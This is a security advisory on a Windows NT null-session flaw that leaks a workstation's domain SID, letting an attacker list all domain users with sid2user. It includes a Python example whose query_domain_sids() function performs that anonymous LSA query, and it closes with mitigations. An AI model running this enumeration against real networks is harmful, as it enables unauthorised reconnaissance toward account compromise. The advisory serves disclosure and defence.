COMMAND

    kernel

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Pascal Longpre found the following.  It is possible to list the  whole
    user list of a domain by querying any workstation that is a  member
    of that domain.  Even if the domain controller is hidden  behind  a
    firewall or has IP filtering enabled, the list still comes out, since
    the workstation forwards the lookups to its DC for you.   Pascal
    suspects that this may even work on a workstation connected to its
    DC through a VPN (not tested yet).

    The idea is to get the workstation to give up its domain SID through
    the LsaQueryInformationPolicy() function.  Normally  the  LSA policy
    handle would have to be opened with the "GENERIC_READ | GENERIC_EXECUTE"
    access rights for that call to work, and a null session is  refused
    those rights, but Pascal discovered that by simply requesting
    "MAXIMUM_ALLOWED" instead (which asks for whatever subset the  DACL
    happens to grant rather than failing on a specific right) the handle
    is opened and the query works through the good old null session.

    Pascal wrote a small program called "dom2sid" demonstrating  this.
    It should be available  shortly on the www.securityfocus.com  free
    tools list.  It returns the computer/domain names and SIDs, i.e. the
    workstation's own account-domain SID and the SID of the  domain  it
    belongs to.  You can then feed the domain SID to the popular sid2user
    tool and get the whole user list.  If both SIDs are equal, you  have
    found a DC: on a domain controller the local account domain  is  the
    domain itself.

    Dom2sid is now available at Security Focus at:

        http://www.securityfocus.com/level2/?go=tools&id=1239

    Also, sid2user and user2sid are available at:

        http://www.securityfocus.com/level2/?go=tools&id=544
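    The following is an added example, not code from the original advisory
    nor from dom2sid or sid2user.  The offline part decodes and encodes the
    binary SID that LsaQueryInformationPolicy() hands back, appends a  RID
    the way sid2user walks them (500, 501, 1000, 1001, ...), and performs
    the "both SIDs equal means DC" test.  The query_domain_sids() function
    is the dom2sid equivalent over a null session and is an assumption:  it
    relies on the impacket library (the LsarOpenPolicy2 / LsarQueryInformationPolicy2
    calls mirror impacket's own lookupsid example) and on a reachable  target
    name; everything else runs with the standard library only.  The  sample
    SID is constructed for the example.

```python
"""SID helpers around a dom2sid-style LSA policy query (added example)."""
import struct


def sid_to_string(blob: bytes) -> str:
    """Decode a binary SID: revision(1) subauth-count(1) authority(6, big-endian)
    followed by count little-endian 32-bit sub-authorities."""
    if len(blob) < 8:
        raise ValueError("SID too short")
    revision, count = blob[0], blob[1]
    if revision != 1 or len(blob) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def string_to_sid(text: str) -> bytes:
    """Encode an S-1-... string back into the binary layout decoded above."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or len(subs) > 15:
        raise ValueError("malformed SID string")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def with_rid(domain_sid: str, rid: int) -> str:
    """Append a RID to a domain SID; sid2user does this for each RID it tries."""
    return "%s-%d" % (domain_sid, rid)


def is_domain_controller(account_domain_sid: str, primary_domain_sid) -> bool:
    """On a DC the local account domain is the domain itself, so both SIDs match.
    A workgroup host has no primary domain SID (None) and is never a DC."""
    return primary_domain_sid is not None and account_domain_sid == primary_domain_sid


def query_domain_sids(target: str):
    """dom2sid equivalent over a null session (assumes impacket is installed).

    Opens the LSA policy object with MAXIMUM_ALLOWED over an anonymous bind to
    \\pipe\\lsarpc and returns (account_domain_sid, primary_domain_sid).
    Domain names are left out; the SIDs are what sid2user needs."""
    from impacket.dcerpc.v5 import transport, lsad          # assumed dependency
    from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED

    rpc = transport.DCERPCTransportFactory(r"ncacn_np:%s[\pipe\lsarpc]" % target)
    rpc.set_credentials("", "")          # empty user and password: null session
    dce = rpc.get_dce_rpc()
    dce.connect()
    dce.bind(lsad.MSRPC_UUID_LSAD)
    handle = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED)["PolicyHandle"]
    cls = lsad.POLICY_INFORMATION_CLASS
    acct = lsad.hLsarQueryInformationPolicy2(dce, handle, cls.PolicyAccountDomainInformation)
    account_sid = acct["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical()
    prim = lsad.hLsarQueryInformationPolicy2(dce, handle, cls.PolicyPrimaryDomainInformation)
    try:
        primary_sid = prim["PolicyInformation"]["PolicyPrimaryDomainInfo"]["Sid"].formatCanonical()
    except Exception:
        primary_sid = None               # workgroup host: NULL primary domain SID
    lsad.hLsarClose(dce, handle)
    dce.disconnect()
    return account_sid, primary_sid


# Constructed sample: binary form of S-1-5-21-1004336348-1177238915-682003330
SAMPLE_DOMAIN_SID = (bytes([1, 4]) + (5).to_bytes(6, "big")
                     + struct.pack("<4I", 21, 1004336348, 1177238915, 682003330))

if __name__ == "__main__":
    domain = sid_to_string(SAMPLE_DOMAIN_SID)
    print("domain SID:", domain)
    for rid in (500, 501, 1000, 1001):
        print("candidate:", with_rid(domain, rid))   # feed these to LookupAccountSid
    # Pretend the workstation reported the same SID for both classes: it is a DC.
    print("DC?", is_domain_controller(domain, domain))
```

    Run it stand-alone to see the SID walk on the constructed sample; point
    query_domain_sids() at a host only where you are authorised to test.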

SOLUTION

    The "RestrictAnonymous" registry setting provided by Microsoft for
    NT 4.0 doesn't help here.  The only known way to stop this  behaviour
    on NT 4.0 is a program called fixpol.exe, written by Phil Brass,
    currently with ISS.  It sets a tighter DACL on the LSA policy  object
    so that a null session is no longer granted the right to read it.   A
    very nice piece of code.  Upgrading to Windows 2000 also stops  this
    particular method, and Windows 2000 additionally allows
    RestrictAnonymous=2, which denies null sessions completely.  However,
    it isn't a good idea to set that on a domain controller in a mixed-mode
    domain, because down-level (NT 4.0) members and trusts still depend on
    null sessions.  Windows 2000 hands out a lot less information to a null
    session than NT 4.0 does.

    The real solution is to require strong passwords with  a  reasonably
    short change interval, so that even if someone does get  your  user
    list, it doesn't get them anywhere.  Also use some form of port
    filtering to disallow access to TCP and UDP ports 137-139  from  the
    Internet (and 445 on Windows 2000).  Black Ice is a nice product.